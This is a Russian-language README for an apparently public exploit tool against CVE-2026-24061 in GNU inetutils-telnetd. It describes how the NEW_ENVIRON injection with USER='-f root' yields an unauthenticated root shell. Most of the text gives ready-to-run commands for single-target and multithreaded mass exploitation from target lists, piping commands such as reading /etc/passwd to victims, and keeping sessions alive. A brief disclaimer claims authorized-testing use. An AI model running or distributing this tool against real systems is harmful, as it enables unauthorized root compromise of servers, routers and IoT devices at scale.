
Эксплойт удаленного обхода аутентификации для GNU inetutils-telnetd (CVE-2026-24061) с использованием CRLF-инъекции для получения мгновенной root-оболочки. Поддерживает одиночную/массовую эксплуатацию, многопоточность, настраиваемые порты, конвейерный режим и поддержание сессии.

GNU inetutils-telnetd Редакция - CRLF-инъекция для обхода аутентификации и мгновенного получения root-оболочки
Этот эксплойт использует CVE-2026-24061, критическую уязвимость удаленного обхода аутентификации в GNU inetutils-telnetd. Путем инъекции специально сформированной полезной нагрузки NEW_ENVIRON с USER='-f root' он обходит аутентификацию и предоставляет мгновенную root-оболочку без каких-либо учетных данных.
Примечание: Скрипт
basic_exploit.sh— это упрощенная, более быстрая версияexploit.sh; однако для полной функциональности рекомендуется использоватьexploit.sh.
| Продукт | Версии |
|---|---|
| GNU inetutils-telnetd | 1.9.3 - 2.7 |
| Затронутые дистрибутивы Linux | Debian, CentOS, Ubuntu и их производные (Zorin OS, Linux Mint, Pop!_OS и Elementary OS) |
| Встраиваемые устройства | NAS, IoT, маршрутизаторы |
⚠️ Отказ от ответственности: Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ является незаконным.
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-24061-PoC-Exploit
cd CVE-2026-24061-PoC-Exploit
# Python version
pip3 install -r requirements.txt
# Bash version
chmod +x exploit.sh
chmod +x basic_exploit.sh
# Python version
python3 exploit.py -u 192.168.1.100
# Bash version
./exploit.sh -u 192.168.1.100
./basic_exploit.sh 192.168.1.100
# Custom port (non-standard telnet port)
python3 exploit.py -u 10.0.0.5 -p 2323
# Custom username injection
python3 exploit.py -u 10.0.0.5 -usr admin
# Create targets file
echo "192.168.1.100" > targets.txt
echo "192.168.1.101" >> targets.txt
echo "10.0.0.5:2323" >> targets.txt
# Mass exploit with 20 threads
python3 exploit.py -l targets.txt -m 20
# Bash version
./exploit.sh -l targets.txt -m 20
# Execute commands via pipe
echo "id; whoami; uname -a" | python3 exploit.py -u 192.168.1.100
# Multiple commands
echo "ls -la; cat /etc/passwd; ps aux" | ./exploit.sh -u 192.168.1.100
# Verbose mode with debug output
python3 exploit.py -u 192.168.1.100 -v
# Custom timeout and retries
python3 exploit.py -u 192.168.1.100 --timeout 10 --retries 5
# Session keep-alive (maintain shell)
python3 exploit.py -u 192.168.1.100 --keep-alive
Посмотрите мои другие репозитории с эксплойтами:
| Категория | Возможности |
|---|
| Эксплуатация | ✅ Обход аутентификации через CRLF-инъекцию ✅ Мгновенная root-оболочка ✅ Инъекция пользователя (-f admin, -f user) |
| Сканирование | ✅ Эксплуатация одиночной цели ✅ Массовая эксплуатация из файла ✅ Многопоточность (настраиваемое число потоков) ✅ Поддержка пользовательского порта |
| Расширенные | ✅ Режим pipe (выполнение команд через stdin) ✅ Поддержание сессии ✅ Механизм повторных попыток ✅ Контроль времени ожидания |
| Удобство использования | ✅ Цветной вывод (colorama) ✅ Двуязычный (Python и Bash) ✅ Подробный/отладочный режим |
| Short | Long | Описание | По умолчанию |
|---|
-u | --url | IP-адрес цели | Обязательно |
-p | --port | Порт цели | 23 |
-l | --list | Файл со списком целей | Нет |
-m | --max-threads | Максимальное число потоков для массовой эксплуатации | 10 |
-usr | --username | Имя пользователя для инъекции | root |
-t | --timeout | Таймаут сокета (секунды) | 10 |
-r | --retries | Количество попыток повторения | 3 |
-v | --verbose | Включить отладочный вывод | False |
--keep-alive | Поддерживать сессию после эксплуатации | False |